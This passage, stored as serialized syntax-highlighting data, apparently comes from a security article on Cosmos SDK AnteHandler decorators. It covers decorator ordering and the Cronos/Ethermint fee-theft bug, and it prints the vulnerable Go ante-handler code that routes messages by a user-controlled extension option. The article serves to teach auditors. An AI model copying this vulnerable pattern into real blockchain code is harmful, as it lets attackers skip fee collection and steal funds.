NewSetPubKeyDecorator",{"type":24,"tag":301,"props":86214,"children":86215},{"style":359},[86216],{"type":30,"value":362},{"type":24,"tag":301,"props":86218,"children":86219},{"style":369},[86220],{"type":30,"value":42782},{"type":24,"tag":301,"props":86222,"children":86223},{"style":359},[86224],{"type":30,"value":206},{"type":24,"tag":301,"props":86226,"children":86227},{"style":369},[86228],{"type":30,"value":86093},{"type":24,"tag":301,"props":86230,"children":86231},{"style":359},[86232],{"type":30,"value":21967},{"type":24,"tag":301,"props":86234,"children":86235},{"style":1062},[86236],{"type":30,"value":86237},"// SetPubKeyDecorator must be called before all signature verification decorators\n",{"type":24,"tag":301,"props":86239,"children":86240},{"class":303,"line":504},[86241,86246,86250,86254,86258,86262],{"type":24,"tag":301,"props":86242,"children":86243},{"style":314},[86244],{"type":30,"value":86245}," NewValidateSigCountDecorator",{"type":24,"tag":301,"props":86247,"children":86248},{"style":359},[86249],{"type":30,"value":362},{"type":24,"tag":301,"props":86251,"children":86252},{"style":369},[86253],{"type":30,"value":42782},{"type":24,"tag":301,"props":86255,"children":86256},{"style":359},[86257],{"type":30,"value":206},{"type":24,"tag":301,"props":86259,"children":86260},{"style":369},[86261],{"type":30,"value":86093},{"type":24,"tag":301,"props":86263,"children":86264},{"style":359},[86265],{"type":30,"value":4656},{"type":24,"tag":301,"props":86267,"children":86268},{"class":303,"line":512},[86269,86274,86278,86282,86286,86290,86294,86298,86302,86307],{"type":24,"tag":301,"props":86270,"children":86271},{"style":314},[86272],{"type":30,"value":86273}," NewSigGasConsumeDecorator",{"type":24,"tag":301,"props":86275,"children":86276},{"style":359},[86277],{"type":30,"value":362},{"type":24,"tag":301,"props":86279,"children":86280},{"style":369},[86281],{"type":30,"value":42782},{"type":24,"tag":301,"props":86283,"children":86284},{"style":359},[86285],{"type":30,"value":206},{"type":24,"tag":301,"props":86287,"children":86288},{"style":369},[86289],{"type":30,"value":86093},{"type":24,"tag":301,"props":86291,"children":86292},{"style":359},[86293],{"type":30,"value":377},{"type":24,"tag":301,"props":86295,"children":86296},{"style":369},[86297],{"type":30,"value":42782},{"type":24,"tag":301,"props":86299,"children":86300},{"style":359},[86301],{"type":30,"value":206},{"type":24,"tag":301,"props":86303,"children":86304},{"style":369},[86305],{"type":30,"value":86306},"SigGasConsumer",{"type":24,"tag":301,"props":86308,"children":86309},{"style":359},[86310],{"type":30,"value":4656},{"type":24,"tag":301,"props":86312,"children":86313},{"class":303,"line":592},[86314,86319,86323,86327,86331,86335,86339,86343,86347,86352],{"type":24,"tag":301,"props":86315,"children":86316},{"style":314},[86317],{"type":30,"value":86318}," NewSigVerificationDecorator",{"type":24,"tag":301,"props":86320,"children":86321},{"style":359},[86322],{"type":30,"value":362},{"type":24,"tag":301,"props":86324,"children":86325},{"style":369},[86326],{"type":30,"value":42782},{"type":24,"tag":301,"props":86328,"children":86329},{"style":359},[86330],{"type":30,"value":206},{"type":24,"tag":301,"props":86332,"children":86333},{"style":369},[86334],{"type":30,"value":86093},{"type":24,"tag":301,"props":86336,"children":86337},{"style":359},[86338],{"type":30,"value":377},{"type":24,"tag":301,"props":86340,"children":86341},{"style":369},[86342],{"type":30,"value":42782},{"type":24,"tag":301,"props":86344,"children":86345},{"style":359},[86346],{"type":30,"value":206},{"type":24,"tag":301,"props":86348,"children":86349},{"style":369},[86350],{"type":30,"value":86351},"SignModeHandler",{"type":24,"tag":301,"props":86353,"children":86354},{"style":359},[86355],{"type":30,"value":4656},{"type":24,"tag":301,"props":86357,"children":86358},{"class":303,"line":619},[86359,86364,86368,86372,86376,86380],{"type":24,"tag":301,"props":86360,"children":86361},{"style":314},[86362],{"type":30,"value":86363}," NewIncrementSequenceDecorator",{"type":24,"tag":301,"props":86365,"children":86366},{"style":359},[86367],{"type":30,"value":362},{"type":24,"tag":301,"props":86369,"children":86370},{"style":369},[86371],{"type":30,"value":42782},{"type":24,"tag":301,"props":86373,"children":86374},{"style":359},[86375],{"type":30,"value":206},{"type":24,"tag":301,"props":86377,"children":86378},{"style":369},[86379],{"type":30,"value":86093},{"type":24,"tag":301,"props":86381,"children":86382},{"style":359},[86383],{"type":30,"value":4656},{"type":24,"tag":301,"props":86385,"children":86386},{"class":303,"line":635},[86387],{"type":24,"tag":301,"props":86388,"children":86389},{"style":359},[86390],{"type":30,"value":698},{"type":24,"tag":32,"props":86392,"children":86393},{},[86394,86396,86401,86403,86409,86410,86416],{"type":30,"value":86395},"Unfortunately, that order wouldn't work. This is because there are other ",{"type":24,"tag":145,"props":86397,"children":86399},{"className":86398},[],[86400],{"type":30,"value":85931},{"type":30,"value":86402},", such as ",{"type":24,"tag":145,"props":86404,"children":86406},{"className":86405},[],[86407],{"type":30,"value":86408},"SigGasConsumeDecorator",{"type":30,"value":2378},{"type":24,"tag":145,"props":86411,"children":86413},{"className":86412},[],[86414],{"type":30,"value":86415},"ConsumeGasForTxSizeDecorator",{"type":30,"value":86417},", that modify account balances. By placing our decorator at the very start of the chain, we might pass the check and later have the signers' balances deducted before reaching the end of the decorator chain and starting transaction execution. Consequently, the invariance we intended to ensure may no longer hold, rendering our check useless.",{"type":24,"tag":32,"props":86419,"children":86420},{},[86421,86423,86429,86431,86436],{"type":30,"value":86422},"The easiest \"mitigation\" is to move our decorator down into the chain list. We say this lightly because it's important to consider various factors such as whether nested ",{"type":24,"tag":145,"props":86424,"children":86426},{"className":86425},[],[86427],{"type":30,"value":86428},"msgs",{"type":30,"value":86430}," are allowed (e.g. the authz module is present), as this precaution alone might not be enough to fully resolve the issue. Without a comprehensive understanding of the entire system, there is a risk that mistakes will still be made in the ",{"type":24,"tag":145,"props":86432,"children":86434},{"className":86433},[],[86435],{"type":30,"value":85257},{"type":30,"value":86437}," chain.",{"type":24,"tag":80,"props":86439,"children":86441},{"id":86440},"real-world-examples-2",[86442],{"type":30,"value":83401},{"type":24,"tag":32,"props":86444,"children":86445},{},[86446,86448,86453,86455,86462],{"type":30,"value":86447},"An instance of ",{"type":24,"tag":145,"props":86449,"children":86451},{"className":86450},[],[86452],{"type":30,"value":85182},{"type":30,"value":86454}," misuse is a ",{"type":24,"tag":188,"props":86456,"children":86459},{"href":86457,"rel":86458},"https://medium.com/immunefi/cronos-theft-of-transactions-fees-bugfix-postmortem-b33f941b9570",[192],[86460],{"type":30,"value":86461},"Theft of Fund bug",{"type":30,"value":86463}," that was exploited in a Cronos contract.",{"type":24,"tag":32,"props":86465,"children":86466},{},[86467,86469,86474,86476,86481,86483,86489,86491,86497,86499,86504,86506,86511],{"type":30,"value":86468},"In this scenario, ",{"type":24,"tag":145,"props":86470,"children":86472},{"className":86471},[],[86473],{"type":30,"value":86428},{"type":30,"value":86475}," are multiplexed to different ",{"type":24,"tag":145,"props":86477,"children":86479},{"className":86478},[],[86480],{"type":30,"value":85182},{"type":30,"value":86482}," sets through the user-controlled ",{"type":24,"tag":145,"props":86484,"children":86486},{"className":86485},[],[86487],{"type":30,"value":86488},"ExtensionOptionsEthereumTx",{"type":30,"value":86490}," option. However, due to a lack of tx validation, if a ",{"type":24,"tag":145,"props":86492,"children":86494},{"className":86493},[],[86495],{"type":30,"value":86496},"MsgEthereumTx",{"type":30,"value":86498}," does not have ",{"type":24,"tag":145,"props":86500,"children":86502},{"className":86501},[],[86503],{"type":30,"value":86488},{"type":30,"value":86505}," specified, it will be routed to non-Ethereum ",{"type":24,"tag":145,"props":86507,"children":86509},{"className":86508},[],[86510],{"type":30,"value":85931},{"type":30,"value":86512},", failing to collect fees from users as intended. Consequently, attackers can exploit the fee refund at the end of transaction processing to steal funds.",{"type":24,"tag":32,"props":86514,"children":86515},{},[86516],{"type":24,"tag":188,"props":86517,"children":86520},{"href":86518,"rel":86519},"https://github.com/crypto-org-chain/ethermint/blob/82805507f7d2e83cad547736883dc22acfb52440/app/ante/ante.go#L33",[192],[86521],{"type":30,"value":83451},{"type":24,"tag":291,"props":86523,"children":86525},{"code":86524,"language":82877,"meta":7,"className":82878,"style":7},"func NewAnteHandler(\n ak evmtypes.AccountKeeper,\n bankKeeper evmtypes.BankKeeper,\n evmKeeper EVMKeeper,\n feeGrantKeeper authante.FeegrantKeeper,\n channelKeeper channelkeeper.Keeper,\n signModeHandler authsigning.SignModeHandler,\n) sdk.AnteHandler {\n return func(\n ctx sdk.Context, tx sdk.Tx, sim bool,\n ) (newCtx sdk.Context, err error) {\n var anteHandler sdk.AnteHandler\n\n defer Recover(ctx.Logger(), &err)\n\n txWithExtensions, ok := tx.(authante.HasExtensionOptionsTx)\n if ok {\n opts := txWithExtensions.GetExtensionOptions()\n if len(opts) > 0 {\n switch typeURL := opts[0].GetTypeUrl(); typeURL {\n case \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\":\n // handle as *evmtypes.MsgEthereumTx\n\n anteHandler = sdk.ChainAnteDecorators(\n NewEthSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n ...\n NewEthIncrementSenderSequenceDecorator(ak), // innermost AnteDecorator.\n )\n\n default:\n return ctx, stacktrace.Propagate(\n sdkerrors.Wrap(sdkerrors.ErrUnknownExtensionOptions, typeURL),\n \"rejecting tx with unsupported extension option\",\n )\n }\n\n return anteHandler(ctx, tx, sim)\n }\n }\n\n // SHOULD CHECK TX IS NOT MsgEthereumTx HERE\n\n switch tx.(type) {\n case sdk.Tx:\n anteHandler = sdk.ChainAnteDecorators(\n authante.NewSetUpContextDecorator(), // outermost AnteDecorator. SetUpContext must be called first\n ...\n authante.NewIncrementSequenceDecorator(ak), // innermost AnteDecorator\n )\n default:\n return ctx, stacktrace.Propagate(\n sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"invalid transaction type: %T\", tx),\n \"transaction is not an SDK tx\",\n )\n }\n\n return anteHandler(ctx, tx, sim)\n }\n}\n",[86526],{"type":24,"tag":145,"props":86527,"children":86528},{"__ignoreMap":7},[86529,86545,86570,86594,86611,86636,86662,86687,86710,86726,86782,86823,86849,86856,86902,86909,86955,86971,87001,87036,87088,87105,87113,87120,87149,87165,87173,87199,87207,87214,87226,87260,87306,87318,87325,87332,87339,87378,87385,87392,87399,87407,87414,87438,87462,87490,87515,87523,87556,87563,87575,87606,87661,87673,87680,87687,87694,87733,87740],{"type":24,"tag":301,"props":86530,"children":86531},{"class":303,"line":304},[86532,86536,86541],{"type":24,"tag":301,"props":86533,"children":86534},{"style":348},[86535],{"type":30,"value":83013},{"type":24,"tag":301,"props":86537,"children":86538},{"style":314},[86539],{"type":30,"value":86540}," NewAnteHandler",{"type":24,"tag":301,"props":86542,"children":86543},{"style":359},[86544],{"type":30,"value":1707},{"type":24,"tag":301,"props":86546,"children":86547},{"class":303,"line":320},[86548,86553,86558,86562,86566],{"type":24,"tag":301,"props":86549,"children":86550},{"style":369},[86551],{"type":30,"value":86552}," ak",{"type":24,"tag":301,"props":86554,"children":86555},{"style":10246},[86556],{"type":30,"value":86557}," evmtypes",{"type":24,"tag":301,"props":86559,"children":86560},{"style":359},[86561],{"type":30,"value":206},{"type":24,"tag":301,"props":86563,"children":86564},{"style":10246},[86565],{"type":30,"value":86093},{"type":24,"tag":301,"props":86567,"children":86568},{"style":359},[86569],{"type":30,"value":1729},{"type":24,"tag":301,"props":86571,"children":86572},{"class":303,"line":335},[86573,86578,86582,86586,86590],{"type":24,"tag":301,"props":86574,"children":86575},{"style":369},[86576],{"type":30,"value":86577}," bankKeeper",{"type":24,"tag":301,"props":86579,"children":86580},{"style":10246},[86581],{"type":30,"value":86557},{"type":24,"tag":301,"props":86583,"children":86584},{"style":359},[86585],{"type":30,"value":206},{"type":24,"tag":301,"props":86587,"children":86588},{"style":10246},[86589],{"type":30,"value":86166},{"type":24,"tag":301,"props":86591,"children":86592},{"style":359},[86593],{"type":30,"value":1729},{"type":24,"tag":301,"props":86595,"children":86596},{"class":303,"line":344},[86597,86602,86607],{"type":24,"tag":301,"props":86598,"children":86599},{"style":369},[86600],{"type":30,"value":86601}," evmKeeper",{"type":24,"tag":301,"props":86603,"children":86604},{"style":10246},[86605],{"type":30,"value":86606}," EVMKeeper",{"type":24,"tag":301,"props":86608,"children":86609},{"style":359},[86610],{"type":30,"value":1729},{"type":24,"tag":301,"props":86612,"children":86613},{"class":303,"line":401},[86614,86619,86624,86628,86632],{"type":24,"tag":301,"props":86615,"children":86616},{"style":369},[86617],{"type":30,"value":86618}," feeGrantKeeper",{"type":24,"tag":301,"props":86620,"children":86621},{"style":10246},[86622],{"type":30,"value":86623}," authante",{"type":24,"tag":301,"props":86625,"children":86626},{"style":359},[86627],{"type":30,"value":206},{"type":24,"tag":301,"props":86629,"children":86630},{"style":10246},[86631],{"type":30,"value":86183},{"type":24,"tag":301,"props":86633,"children":86634},{"style":359},[86635],{"type":30,"value":1729},{"type":24,"tag":301,"props":86637,"children":86638},{"class":303,"line":415},[86639,86644,86649,86653,86658],{"type":24,"tag":301,"props":86640,"children":86641},{"style":369},[86642],{"type":30,"value":86643}," channelKeeper",{"type":24,"tag":301,"props":86645,"children":86646},{"style":10246},[86647],{"type":30,"value":86648}," channelkeeper",{"type":24,"tag":301,"props":86650,"children":86651},{"style":359},[86652],{"type":30,"value":206},{"type":24,"tag":301,"props":86654,"children":86655},{"style":10246},[86656],{"type":30,"value":86657},"Keeper",{"type":24,"tag":301,"props":86659,"children":86660},{"style":359},[86661],{"type":30,"value":1729},{"type":24,"tag":301,"props":86663,"children":86664},{"class":303,"line":439},[86665,86670,86675,86679,86683],{"type":24,"tag":301,"props":86666,"children":86667},{"style":369},[86668],{"type":30,"value":86669}," signModeHandler",{"type":24,"tag":301,"props":86671,"children":86672},{"style":10246},[86673],{"type":30,"value":86674}," authsigning",{"type":24,"tag":301,"props":86676,"children":86677},{"style":359},[86678],{"type":30,"value":206},{"type":24,"tag":301,"props":86680,"children":86681},{"style":10246},[86682],{"type":30,"value":86351},{"type":24,"tag":301,"props":86684,"children":86685},{"style":359},[86686],{"type":30,"value":1729},{"type":24,"tag":301,"props":86688,"children":86689},{"class":303,"line":447},[86690,86694,86698,86702,86706],{"type":24,"tag":301,"props":86691,"children":86692},{"style":359},[86693],{"type":30,"value":911},{"type":24,"tag":301,"props":86695,"children":86696},{"style":10246},[86697],{"type":30,"value":85442},{"type":24,"tag":301,"props":86699,"children":86700},{"style":359},[86701],{"type":30,"value":206},{"type":24,"tag":301,"props":86703,"children":86704},{"style":10246},[86705],{"type":30,"value":85182},{"type":24,"tag":301,"props":86707,"children":86708},{"style":359},[86709],{"type":30,"value":3035},{"type":24,"tag":301,"props":86711,"children":86712},{"class":303,"line":476},[86713,86717,86722],{"type":24,"tag":301,"props":86714,"children":86715},{"style":308},[86716],{"type":30,"value":680},{"type":24,"tag":301,"props":86718,"children":86719},{"style":348},[86720],{"type":30,"value":86721}," func",{"type":24,"tag":301,"props":86723,"children":86724},{"style":359},[86725],{"type":30,"value":1707},{"type":24,"tag":301,"props":86727,"children":86728},{"class":303,"line":495},[86729,86733,86737,86741,86745,86749,86753,86757,86761,86765,86769,86774,86778],{"type":24,"tag":301,"props":86730,"children":86731},{"style":369},[86732],{"type":30,"value":32942},{"type":24,"tag":301,"props":86734,"children":86735},{"style":10246},[86736],{"type":30,"value":85353},{"type":24,"tag":301,"props":86738,"children":86739},{"style":359},[86740],{"type":30,"value":206},{"type":24,"tag":301,"props":86742,"children":86743},{"style":10246},[86744],{"type":30,"value":83062},{"type":24,"tag":301,"props":86746,"children":86747},{"style":359},[86748],{"type":30,"value":377},{"type":24,"tag":301,"props":86750,"children":86751},{"style":369},[86752],{"type":30,"value":85893},{"type":24,"tag":301,"props":86754,"children":86755},{"style":10246},[86756],{"type":30,"value":85353},{"type":24,"tag":301,"props":86758,"children":86759},{"style":359},[86760],{"type":30,"value":206},{"type":24,"tag":301,"props":86762,"children":86763},{"style":10246},[86764],{"type":30,"value":85386},{"type":24,"tag":301,"props":86766,"children":86767},{"style":359},[86768],{"type":30,"value":377},{"type":24,"tag":301,"props":86770,"children":86771},{"style":369},[86772],{"type":30,"value":86773},"sim",{"type":24,"tag":301,"props":86775,"children":86776},{"style":10246},[86777],{"type":30,"value":18848},{"type":24,"tag":301,"props":86779,"children":86780},{"style":359},[86781],{"type":30,"value":1729},{"type":24,"tag":301,"props":86783,"children":86784},{"class":303,"line":504},[86785,86790,86795,86799,86803,86807,86811,86815,86819],{"type":24,"tag":301,"props":86786,"children":86787},{"style":359},[86788],{"type":30,"value":86789}," ) (",{"type":24,"tag":301,"props":86791,"children":86792},{"style":369},[86793],{"type":30,"value":86794},"newCtx",{"type":24,"tag":301,"props":86796,"children":86797},{"style":10246},[86798],{"type":30,"value":85353},{"type":24,"tag":301,"props":86800,"children":86801},{"style":359},[86802],{"type":30,"value":206},{"type":24,"tag":301,"props":86804,"children":86805},{"style":10246},[86806],{"type":30,"value":83062},{"type":24,"tag":301,"props":86808,"children":86809},{"style":359},[86810],{"type":30,"value":377},{"type":24,"tag":301,"props":86812,"children":86813},{"style":369},[86814],{"type":30,"value":55155},{"type":24,"tag":301,"props":86816,"children":86817},{"style":10246},[86818],{"type":30,"value":21667},{"type":24,"tag":301,"props":86820,"children":86821},{"style":359},[86822],{"type":30,"value":398},{"type":24,"tag":301,"props":86824,"children":86825},{"class":303,"line":512},[86826,86831,86836,86840,86844],{"type":24,"tag":301,"props":86827,"children":86828},{"style":348},[86829],{"type":30,"value":86830}," var",{"type":24,"tag":301,"props":86832,"children":86833},{"style":369},[86834],{"type":30,"value":86835}," anteHandler",{"type":24,"tag":301,"props":86837,"children":86838},{"style":10246},[86839],{"type":30,"value":85353},{"type":24,"tag":301,"props":86841,"children":86842},{"style":359},[86843],{"type":30,"value":206},{"type":24,"tag":301,"props":86845,"children":86846},{"style":10246},[86847],{"type":30,"value":86848},"AnteHandler\n",{"type":24,"tag":301,"props":86850,"children":86851},{"class":303,"line":592},[86852],{"type":24,"tag":301,"props":86853,"children":86854},{"emptyLinePlaceholder":16},[86855],{"type":30,"value":341},{"type":24,"tag":301,"props":86857,"children":86858},{"class":303,"line":619},[86859,86864,86869,86873,86877,86881,86886,86890,86894,86898],{"type":24,"tag":301,"props":86860,"children":86861},{"style":308},[86862],{"type":30,"value":86863}," defer",{"type":24,"tag":301,"props":86865,"children":86866},{"style":314},[86867],{"type":30,"value":86868}," Recover",{"type":24,"tag":301,"props":86870,"children":86871},{"style":359},[86872],{"type":30,"value":362},{"type":24,"tag":301,"props":86874,"children":86875},{"style":369},[86876],{"type":30,"value":27051},{"type":24,"tag":301,"props":86878,"children":86879},{"style":359},[86880],{"type":30,"value":206},{"type":24,"tag":301,"props":86882,"children":86883},{"style":314},[86884],{"type":30,"value":86885},"Logger",{"type":24,"tag":301,"props":86887,"children":86888},{"style":359},[86889],{"type":30,"value":25153},{"type":24,"tag":301,"props":86891,"children":86892},{"style":385},[86893],{"type":30,"value":556},{"type":24,"tag":301,"props":86895,"children":86896},{"style":369},[86897],{"type":30,"value":55155},{"type":24,"tag":301,"props":86899,"children":86900},{"style":359},[86901],{"type":30,"value":791},{"type":24,"tag":301,"props":86903,"children":86904},{"class":303,"line":635},[86905],{"type":24,"tag":301,"props":86906,"children":86907},{"emptyLinePlaceholder":16},[86908],{"type":30,"value":341},{"type":24,"tag":301,"props":86910,"children":86911},{"class":303,"line":643},[86912,86917,86921,86925,86929,86933,86937,86942,86946,86951],{"type":24,"tag":301,"props":86913,"children":86914},{"style":369},[86915],{"type":30,"value":86916}," txWithExtensions",{"type":24,"tag":301,"props":86918,"children":86919},{"style":359},[86920],{"type":30,"value":377},{"type":24,"tag":301,"props":86922,"children":86923},{"style":369},[86924],{"type":30,"value":85479},{"type":24,"tag":301,"props":86926,"children":86927},{"style":385},[86928],{"type":30,"value":83129},{"type":24,"tag":301,"props":86930,"children":86931},{"style":369},[86932],{"type":30,"value":74740},{"type":24,"tag":301,"props":86934,"children":86935},{"style":359},[86936],{"type":30,"value":85492},{"type":24,"tag":301,"props":86938,"children":86939},{"style":10246},[86940],{"type":30,"value":86941},"authante",{"type":24,"tag":301,"props":86943,"children":86944},{"style":359},[86945],{"type":30,"value":206},{"type":24,"tag":301,"props":86947,"children":86948},{"style":10246},[86949],{"type":30,"value":86950},"HasExtensionOptionsTx",{"type":24,"tag":301,"props":86952,"children":86953},{"style":359},[86954],{"type":30,"value":791},{"type":24,"tag":301,"props":86956,"children":86957},{"class":303,"line":652},[86958,86962,86967],{"type":24,"tag":301,"props":86959,"children":86960},{"style":308},[86961],{"type":30,"value":3285},{"type":24,"tag":301,"props":86963,"children":86964},{"style":369},[86965],{"type":30,"value":86966}," ok",{"type":24,"tag":301,"props":86968,"children":86969},{"style":359},[86970],{"type":30,"value":3035},{"type":24,"tag":301,"props":86972,"children":86973},{"class":303,"line":666},[86974,86979,86983,86988,86992,86997],{"type":24,"tag":301,"props":86975,"children":86976},{"style":369},[86977],{"type":30,"value":86978}," opts",{"type":24,"tag":301,"props":86980,"children":86981},{"style":385},[86982],{"type":30,"value":83129},{"type":24,"tag":301,"props":86984,"children":86985},{"style":369},[86986],{"type":30,"value":86987}," txWithExtensions",{"type":24,"tag":301,"props":86989,"children":86990},{"style":359},[86991],{"type":30,"value":206},{"type":24,"tag":301,"props":86993,"children":86994},{"style":314},[86995],{"type":30,"value":86996},"GetExtensionOptions",{"type":24,"tag":301,"props":86998,"children":86999},{"style":359},[87000],{"type":30,"value":14551},{"type":24,"tag":301,"props":87002,"children":87003},{"class":303,"line":674},[87004,87008,87012,87016,87020,87024,87028,87032],{"type":24,"tag":301,"props":87005,"children":87006},{"style":308},[87007],{"type":30,"value":65516},{"type":24,"tag":301,"props":87009,"children":87010},{"style":314},[87011],{"type":30,"value":15372},{"type":24,"tag":301,"props":87013,"children":87014},{"style":359},[87015],{"type":30,"value":362},{"type":24,"tag":301,"props":87017,"children":87018},{"style":369},[87019],{"type":30,"value":55296},{"type":24,"tag":301,"props":87021,"children":87022},{"style":359},[87023],{"type":30,"value":911},{"type":24,"tag":301,"props":87025,"children":87026},{"style":385},[87027],{"type":30,"value":1456},{"type":24,"tag":301,"props":87029,"children":87030},{"style":466},[87031],{"type":30,"value":685},{"type":24,"tag":301,"props":87033,"children":87034},{"style":359},[87035],{"type":30,"value":3035},{"type":24,"tag":301,"props":87037,"children":87038},{"class":303,"line":692},[87039,87044,87049,87053,87058,87062,87066,87070,87075,87079,87084],{"type":24,"tag":301,"props":87040,"children":87041},{"style":308},[87042],{"type":30,"value":87043}," switch",{"type":24,"tag":301,"props":87045,"children":87046},{"style":369},[87047],{"type":30,"value":87048}," typeURL",{"type":24,"tag":301,"props":87050,"children":87051},{"style":385},[87052],{"type":30,"value":83129},{"type":24,"tag":301,"props":87054,"children":87055},{"style":369},[87056],{"type":30,"value":87057}," opts",{"type":24,"tag":301,"props":87059,"children":87060},{"style":359},[87061],{"type":30,"value":541},{"type":24,"tag":301,"props":87063,"children":87064},{"style":466},[87065],{"type":30,"value":584},{"type":24,"tag":301,"props":87067,"children":87068},{"style":359},[87069],{"type":30,"value":57079},{"type":24,"tag":301,"props":87071,"children":87072},{"style":314},[87073],{"type":30,"value":87074},"GetTypeUrl",{"type":24,"tag":301,"props":87076,"children":87077},{"style":359},[87078],{"type":30,"value":35204},{"type":24,"tag":301,"props":87080,"children":87081},{"style":369},[87082],{"type":30,"value":87083},"typeURL",{"type":24,"tag":301,"props":87085,"children":87086},{"style":359},[87087],{"type":30,"value":3035},{"type":24,"tag":301,"props":87089,"children":87090},{"class":303,"line":3631},[87091,87096,87101],{"type":24,"tag":301,"props":87092,"children":87093},{"style":308},[87094],{"type":30,"value":87095}," case",{"type":24,"tag":301,"props":87097,"children":87098},{"style":329},[87099],{"type":30,"value":87100}," \"/ethermint.evm.v1.ExtensionOptionsEthereumTx\"",{"type":24,"tag":301,"props":87102,"children":87103},{"style":359},[87104],{"type":30,"value":12388},{"type":24,"tag":301,"props":87106,"children":87107},{"class":303,"line":3639},[87108],{"type":24,"tag":301,"props":87109,"children":87110},{"style":1062},[87111],{"type":30,"value":87112}," // handle as *evmtypes.MsgEthereumTx\n",{"type":24,"tag":301,"props":87114,"children":87115},{"class":303,"line":3647},[87116],{"type":24,"tag":301,"props":87117,"children":87118},{"emptyLinePlaceholder":16},[87119],{"type":30,"value":341},{"type":24,"tag":301,"props":87121,"children":87122},{"class":303,"line":3685},[87123,87128,87132,87136,87140,87145],{"type":24,"tag":301,"props":87124,"children":87125},{"style":369},[87126],{"type":30,"value":87127}," anteHandler",{"type":24,"tag":301,"props":87129,"children":87130},{"style":385},[87131],{"type":30,"value":2537},{"type":24,"tag":301,"props":87133,"children":87134},{"style":369},[87135],{"type":30,"value":85353},{"type":24,"tag":301,"props":87137,"children":87138},{"style":359},[87139],{"type":30,"value":206},{"type":24,"tag":301,"props":87141,"children":87142},{"style":314},[87143],{"type":30,"value":87144},"ChainAnteDecorators",{"type":24,"tag":301,"props":87146,"children":87147},{"style":359},[87148],{"type":30,"value":1707},{"type":24,"tag":301,"props":87150,"children":87151},{"class":303,"line":3713},[87152,87157,87161],{"type":24,"tag":301,"props":87153,"children":87154},{"style":314},[87155],{"type":30,"value":87156}," NewEthSetUpContextDecorator",{"type":24,"tag":301,"props":87158,"children":87159},{"style":359},[87160],{"type":30,"value":25153},{"type":24,"tag":301,"props":87162,"children":87163},{"style":1062},[87164],{"type":30,"value":86007},{"type":24,"tag":301,"props":87166,"children":87167},{"class":303,"line":3721},[87168],{"type":24,"tag":301,"props":87169,"children":87170},{"style":385},[87171],{"type":30,"value":87172}," ...\n",{"type":24,"tag":301,"props":87174,"children":87175},{"class":303,"line":3751},[87176,87181,87185,87190,87194],{"type":24,"tag":301,"props":87177,"children":87178},{"style":314},[87179],{"type":30,"value":87180}," NewEthIncrementSenderSequenceDecorator",{"type":24,"tag":301,"props":87182,"children":87183},{"style":359},[87184],{"type":30,"value":362},{"type":24,"tag":301,"props":87186,"children":87187},{"style":369},[87188],{"type":30,"value":87189},"ak",{"type":24,"tag":301,"props":87191,"children":87192},{"style":359},[87193],{"type":30,"value":21967},{"type":24,"tag":301,"props":87195,"children":87196},{"style":1062},[87197],{"type":30,"value":87198},"// innermost AnteDecorator.\n",{"type":24,"tag":301,"props":87200,"children":87201},{"class":303,"line":3782},[87202],{"type":24,"tag":301,"props":87203,"children":87204},{"style":359},[87205],{"type":30,"value":87206}," )\n",{"type":24,"tag":301,"props":87208,"children":87209},{"class":303,"line":3791},[87210],{"type":24,"tag":301,"props":87211,"children":87212},{"emptyLinePlaceholder":16},[87213],{"type":30,"value":341},{"type":24,"tag":301,"props":87215,"children":87216},{"class":303,"line":3819},[87217,87222],{"type":24,"tag":301,"props":87218,"children":87219},{"style":308},[87220],{"type":30,"value":87221}," default",{"type":24,"tag":301,"props":87223,"children":87224},{"style":359},[87225],{"type":30,"value":12388},{"type":24,"tag":301,"props":87227,"children":87228},{"class":303,"line":4397},[87229,87234,87238,87242,87247,87251,87256],{"type":24,"tag":301,"props":87230,"children":87231},{"style":308},[87232],{"type":30,"value":87233}," return",{"type":24,"tag":301,"props":87235,"children":87236},{"style":369},[87237],{"type":30,"value":32599},{"type":24,"tag":301,"props":87239,"children":87240},{"style":359},[87241],{"type":30,"value":377},{"type":24,"tag":301,"props":87243,"children":87244},{"style":369},[87245],{"type":30,"value":87246},"stacktrace",{"type":24,"tag":301,"props":87248,"children":87249},{"style":359},[87250],{"type":30,"value":206},{"type":24,"tag":301,"props":87252,"children":87253},{"style":314},[87254],{"type":30,"value":87255},"Propagate",{"type":24,"tag":301,"props":87257,"children":87258},{"style":359},[87259],{"type":30,"value":1707},{"type":24,"tag":301,"props":87261,"children":87262},{"class":303,"line":4405},[87263,87268,87272,87276,87280,87285,87289,87294,87298,87302],{"type":24,"tag":301,"props":87264,"children":87265},{"style":369},[87266],{"type":30,"value":87267}," sdkerrors",{"type":24,"tag":301,"props":87269,"children":87270},{"style":359},[87271],{"type":30,"value":206},{"type":24,"tag":301,"props":87273,"children":87274},{"style":314},[87275],{"type":30,"value":85558},{"type":24,"tag":301,"props":87277,"children":87278},{"style":359},[87279],{"type":30,"value":362},{"type":24,"tag":301,"props":87281,"children":87282},{"style":369},[87283],{"type":30,"value":87284},"sdkerrors",{"type":24,"tag":301,"props":87286,"children":87287},{"style":359},[87288],{"type":30,"value":206},{"type":24,"tag":301,"props":87290,"children":87291},{"style":369},[87292],{"type":30,"value":87293},"ErrUnknownExtensionOptions",{"type":24,"tag":301,"props":87295,"children":87296},{"style":359},[87297],{"type":30,"value":377},{"type":24,"tag":301,"props":87299,"children":87300},{"style":369},[87301],{"type":30,"value":87083},{"type":24,"tag":301,"props":87303,"children":87304},{"style":359},[87305],{"type":30,"value":4656},{"type":24,"tag":301,"props":87307,"children":87308},{"class":303,"line":4422},[87309,87314],{"type":24,"tag":301,"props":87310,"children":87311},{"style":329},[87312],{"type":30,"value":87313}," \"rejecting tx with unsupported extension 